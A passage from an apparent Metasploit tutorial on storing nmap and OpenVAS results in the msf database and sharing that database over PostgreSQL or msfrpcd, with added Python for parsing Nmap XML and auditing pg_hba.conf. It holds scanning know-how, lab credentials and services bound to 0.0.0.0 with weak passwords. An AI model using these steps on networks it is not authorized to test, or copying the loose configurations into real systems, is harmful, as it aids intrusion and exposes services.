| Allows remote attackers to inject a request into a session by sending this request during completion of the login form | CVE-2013-2067 |
| apache:tomcat:6.0.24: the attacker could poison a web-cache | CVE-2016-6816 |
| Multiple cross-site request forgery (CSRF) vulnerabilities in the Samba Web Administration Tool (SWAT) in Samba | CVE-2011-2522 |
| The MS-SAMR and MS-LSAD protocol implementations in Samba | CVE-2016-2118 |
| The session-persistence implementation in Apache Tomcat | CVE-2016-0714 |
| Allows remote authenticated users to obtain the "take ownership" privilege via an LSA connection | CVE-2012-2111 |
| Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header | CVE-2010-2227 |
| The default configuration of Apache Tomcat | CVE-2010-4312 |
| Allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding | CVE-2014-0227 |

###9. Penetration testing information database###

db_nmap: store nmap scan results directly in the database
db_import: import results produced by a scanner

msf > db_status
	[*] postgresql selected, no connection
Connect to the database:
	root@attacker:~# systemctl start postgresql.service 
msf > db_status
	[*] postgresql connected to msf

1. db_nmap is a wrapper around nmap; the difference is that it writes the results into the database automatically
	msf > db_nmap -Pn -sV 10.10.10.0/24
		[*] Nmap: Nmap done: 256 IP addresses (6 hosts up) scanned in 411.47 seconds
2. The nmap results can also be exported to a file and then imported into the penetration testing database
	msf > nmap -Pn -sV -oX dmz 10.10.10.0/24
	root@attacker:~# ll dmz 
		-rw-r--r-- 1 root root 18799 Sep  1 10:32 dmz
	msf > db_import /root/dmz
		[*] Importing 'Nmap XML' data
		[*] Import: Parsing with 'Nokogiri v1.8.0'
		[*] Importing host 10.10.10.1
		[*] Importing host 10.10.10.2
		[*] Importing host 10.10.10.129
		[*] Importing host 10.10.10.130
		[*] Importing host 10.10.10.128
		[*] Successfully imported /root/dmz
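What db_import reads from an -oX file, and how the NSE results of section 7 appear in it, as an added example (not the page's or Metasploit's code): a parser for Nmap XML that extracts each host's addresses, hostname, open services and any hostscript result reporting a VULNERABLE state, with the CVE ids it names. The XML document is constructed to mirror the hosts scanned above and is trimmed to the elements the parser uses; the product strings are illustrative.

```python
import re
import xml.etree.ElementTree as ET

# Constructed Nmap XML shaped like the -oX file db_import reads. Hosts, ports,
# MAC and script names mirror the scans above; the element set is trimmed to
# what the parser uses and the product strings are illustrative.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -sV -oX dmz 10.10.10.0/24" version="7.60">
  <host>
    <status state="up"/>
    <address addr="10.10.10.130" addrtype="ipv4"/>
    <address addr="00:0C:29:DB:51:D2" addrtype="mac" vendor="VMware"/>
    <hostnames><hostname name="service.dvssc.com" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="Microsoft ftpd"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1521"><state state="open"/><service name="oracle-tns" product="Oracle TNS listener" version="10.2.0.1.0"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#10;    State: VULNERABLE&#10;    IDs:  CVE:CVE-2017-0143"/>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.10.254" addrtype="ipv4"/>
    <hostnames><hostname name="gate.dvssc.com" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet" product="Linux telnetd"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.10.10.77" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_nmap_xml(xml_text):
    """Return one record per host that is up: IP, MAC, hostname, open services
    (port, protocol, service name, product string) and every hostscript result
    whose output reports 'State: VULNERABLE', with the CVE ids it names."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        rec = {"address": None, "mac": None, "hostname": None, "services": [], "vulns": []}
        for a in h.findall("address"):
            key = "mac" if a.get("addrtype") == "mac" else "address"
            rec[key] = a.get("addr")
        hostname = h.find("hostnames/hostname")
        if hostname is not None:
            rec["hostname"] = hostname.get("name")
        for p in h.findall("ports/port"):
            state = p.find("state")
            if state is None or state.get("state") != "open":
                continue  # only open ports belong in the service inventory
            svc = p.find("service")
            product = None
            if svc is not None:
                product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v) or None
            rec["services"].append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "name": svc.get("name") if svc is not None else None,
                "product": product,
            })
        for s in h.findall("hostscript/script"):
            output = s.get("output", "")
            if "State: VULNERABLE" in output:
                rec["vulns"].append({"script": s.get("id"),
                                     "cves": sorted(set(CVE_RE.findall(output)))})
        hosts.append(rec)
    return hosts
```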

###10. OpenVAS and the penetration testing database###

1. Connect to openvas
	root@attacker:~# openvas-start 
		Starting OpenVas Services
	msf > openvas_connect admin toor 127.0.0.1 9390 ok 
		[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin...
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS connection successful
2. Find the report to import
	msf > openvas_report_list
		[+] OpenVAS list of reports
		ID                                    Task Name    Start Time            Stop Time
		--                                    ---------    ----------            ---------
		07b3eba7-a110-4117-b603-7e50de27759f  Oswapbwa     2017-08-30T14:41:15Z  2017-08-31T03:02:28Z
		6a0bbe85-3eeb-49e1-8440-32988f6079c8  WIndows 2K3  2017-08-31T01:07:01Z  2017-08-31T01:47:53Z
		d7d88501-fe7d-44d3-8b70-566d49758e3a  Ubuntu-scan  2017-08-30T14:41:20Z  
		eac5169e-290e-4be1-9adf-8a401d806fb2  Ubuntu-Scan  2017-08-31T01:12:44Z  2017-08-31T03:30:24Z
3. List the supported report formats
	msf > openvas_format_list 
		[+] OpenVAS list of report formats
		ID                                    Name           Extension  Summary
		--                                    ----           ---------  -------
		5057e5cc-b825-11e4-9d0e-28d24461215b  Anonymous XML  xml        Anonymous version of the raw XML report
		50c9950a-f326-11e4-800c-28d24461215b  Verinice ITG   vna        Greenbone Verinice ITG Report, v1.0.1.
		5ceff8ba-1f62-11e1-ab9f-406186ea4fc5  CPE            csv        Common Product Enumeration CSV table.
		6c248850-1f62-11e1-b082-406186ea4fc5  HTML           html       Single page HTML report.
		77bd6c4a-1f62-11e1-abf0-406186ea4fc5  ITG            csv        German "IT-Grundschutz-Kataloge" report.
		9087b18c-626c-11e3-8892-406186ea4fc5  CSV Hosts      csv        CSV host summary.
		910200ca-dc05-11e1-954f-406186ea4fc5  ARF            xml        Asset Reporting Format v1.0.0.
		9ca6fe72-1f62-11e1-9e7c-406186ea4fc5  NBE            nbe        Legacy OpenVAS report.
		9e5e5deb-879e-4ecc-8be6-a71cd0875cdd  Topology SVG   svg        Network topology SVG image.
		a3810a62-1f62-11e1-9219-406186ea4fc5  TXT            txt        Plain text report.
		a684c02c-b531-11e1-bdc2-406186ea4fc5  LaTeX          tex        LaTeX source file.
		a994b278-1f62-11e1-96ac-406186ea4fc5  XML            xml        Raw XML report.
		c15ad349-bd8d-457a-880a-c7056532ee15  Verinice ISM   vna        Greenbone Verinice ISM Report, v3.0.0.
		c1645568-627a-11e3-a660-406186ea4fc5  CSV Results    csv        CSV result list.
		c402cc3e-b531-11e1-9163-406186ea4fc5  PDF            pdf        Portable Document Format report.
4. Import into the database (import the Oswapbwa scan report in NBE format)
	msf > openvas_report_import 07b3eba7-a110-4117-b603-7e50de27759f 9ca6fe72-1f62-11e1-9e7c-406186ea4fc5
		[*] Importing report to database.
5. After the import succeeds, use vulns to view the imported vulnerability information
	msf > vulns
		[*] Time: 2017-09-01 14:51:32 UTC Vuln: host=10.10.10.129 name=ICMP Timestamp Detection refs=CVE-1999-0524 

###11. Sharing your penetration testing information database###

In Metasploit, the penetration testing database can be shared in two ways:
- have several computers running Metasploit connect to the same network database
- use the MSF RPC service

- Have several computers running Metasploit connect to the same network database
1. Check how the postgres process is running
	root@gate:~# netstat -tulnp | grep "postgres"
		tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      4907/postgres   
		tcp6       0      0 :::5432                 :::*                    LISTEN      4907/postgres  
2. Change the database listen address
	root@attacker:~# vim /etc/postgresql/9.6/main/postgresql.conf
		listen_addresses = '0.0.0.0'  # line 59
		password_encryption = on    # line 88
3. pg_hba.conf is the client authentication configuration file; it defines how clients are authenticated
	root@attacker:~# vim /etc/postgresql/9.6/main/pg_hba.conf 
		host    all     all     0.0.0.0/24      md5     # line 93
4. Restart the postgres database service
	root@attacker:~# systemctl restart postgresql.service
5. Check again that the postgresql service is running normally
	root@attacker:~# netstat -tulnp |grep "postgres"
		tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      7564/postgres
6. Check the postgres database settings used by msf
	root@attacker:~# vim /usr/share/metasploit-framework/config/database.yml
		development: &pgsql
		  adapter: postgresql
		  database: msf
		  username: msf
		  password: admin
		  host: localhost
		  port: 5432
		  pool: 200
		  timeout: 5
7. The database details are:
	postgres address: 10.10.10.128
	postgres port: 5432
	postgres user: msf
	postgres password: admin
	postgresql database: msf
8. Start an msf console on another computer
	msf > db_disconnect 
	msf > db_status 
		[*] postgresql selected, no connection
	msf > db_connect msf:admin@10.10.10.128:5432/msf
		[*] Rebuilding the module cache in the background...
	msf > db_status 
		[*] postgresql connected to msf
9. Test that the connection works
	msf > hosts
		Hosts
		=====

		address       mac                name                os_name        os_flavor  os_sp  purpose  info  comments
		-------       ---                ----                -------        ---------  -----  -------  ----  --------
		10.10.10.1    00:50:56:c0:00:08                      Windows Vista                    client         
		10.10.10.2    00:50:56:f0:84:fe                      Unknown                          device         
		10.10.10.128                     attacker.dvssc.com  Unknown                          device         
		10.10.10.129  00:0c:29:19:70:bf  www.dvssc.com       Unknown                          device         
		10.10.10.130  00:0c:29:db:51:d2  service.dvssc.com   Windows XP                       client         
		10.10.10.133                                         Linux                     3.X    server         
		10.10.10.254  00:0c:29:19:70:bf  gate.dvssc.com      Linux                     2.6.X  server         
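An added check (not from the book or this page) for the pg_hba.conf rule in step 3: it parses network rules and reports those that grant more than a remote msf console needs, contrasting the rule above with a tightened one for the lab subnet. The expected subnet 10.10.10.0/24 and the msf role and database names are taken from steps 6 to 8; note that 0.0.0.0/24 covers only 0.0.0.0 through 0.0.0.255, which is neither the lab subnet nor "every client" (that would be 0.0.0.0/0).

```python
import ipaddress

# Constructed pg_hba.conf fragments. The first contains the rule added in
# step 3 above; the second is the tightened form that admits only the msf role,
# only to the msf database, only from the lab subnet, and only over TLS.
PERMISSIVE_HBA = """
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  peer
host    all       all   0.0.0.0/24     md5
"""

RESTRICTED_HBA = """
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  peer
hostssl msf       msf   10.10.10.0/24  md5
"""

# Subnet the remote msf consoles live in (from steps 7 and 8).
LAB_NET = ipaddress.ip_network("10.10.10.0/24")


def parse_pg_hba(text):
    """Return (lineno, type, database, user, address, method) per rule. Only the
    CIDR address form is handled; 'address netmask' pairs and host names come
    through unchanged and are reported by the audit rather than guessed at."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "local" and len(parts) >= 4:
            rules.append((lineno, parts[0], parts[1], parts[2], None, parts[3]))
        elif parts[0] in ("host", "hostssl", "hostnossl") and len(parts) >= 5:
            rules.append((lineno, parts[0], parts[1], parts[2], parts[3], parts[4]))
    return rules


def audit_pg_hba(text, expected_net=LAB_NET):
    """Return {lineno: [findings]} for network rules that grant more than a
    remote Metasploit console needs; rules without findings are omitted."""
    report = {}
    for lineno, ctype, db, user, addr, method in parse_pg_hba(text):
        if addr is None:
            continue  # Unix-socket rules are not reachable over the network
        findings = []
        if method == "trust":
            findings.append("method 'trust' admits any matching client without a password")
        if db == "all":
            findings.append("database 'all' instead of just the msf database")
        if user == "all":
            findings.append("user 'all' instead of just the msf role")
        if ctype != "hostssl":
            findings.append(f"type '{ctype}' also accepts non-TLS connections; use hostssl")
        try:
            net = ipaddress.ip_network(addr, strict=False)
        except ValueError:
            findings.append(f"address '{addr}' is not a CIDR block; review it by hand")
        else:
            if net.prefixlen == 0:
                findings.append(f"address {net} matches every client")
            elif net.version != expected_net.version or not net.subnet_of(expected_net):
                # 0.0.0.0/24 lands here: it covers only 0.0.0.0-0.0.0.255,
                # so it is neither the lab subnet nor 'everyone' (0.0.0.0/0)
                findings.append(f"address {net} is outside the expected {expected_net}")
        if findings:
            report[lineno] = findings
    return report
```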
 
- Use the MSF RPC service
1. First start a new msf rpc service: -P sets the password required to connect, -U the username, -a the address to bind to (default 127.0.0.1)
	root@attacker:~# msfrpcd -P admin -U msf -a 0.0.0.0
		[*] MSGRPC starting on 0.0.0.0:55553 (SSL):Msg...
		[*] MSGRPC backgrounding at 2017-09-06 21:38:09 -0400...
	root@attacker:~# netstat -tulnp| grep msfrpcd
		tcp        0      0 0.0.0.0:55553           0.0.0.0:*               LISTEN      1794/msfrpcd
2. On another computer with a matching msf4 version, start the MSF GUI (the current one is armitage)
	root@attacker:~# armitage   # a login dialog appears
		Host 10.10.10.128
		Port 55553
		User msf
		Pass admin
3. The login dialog connects to the msfrpcd service started above; click Server, and the penetration testing data from host 10.10.10.128 is shown here.
		msfrpcd shares not only the penetration testing database but also all msf modules and payloads
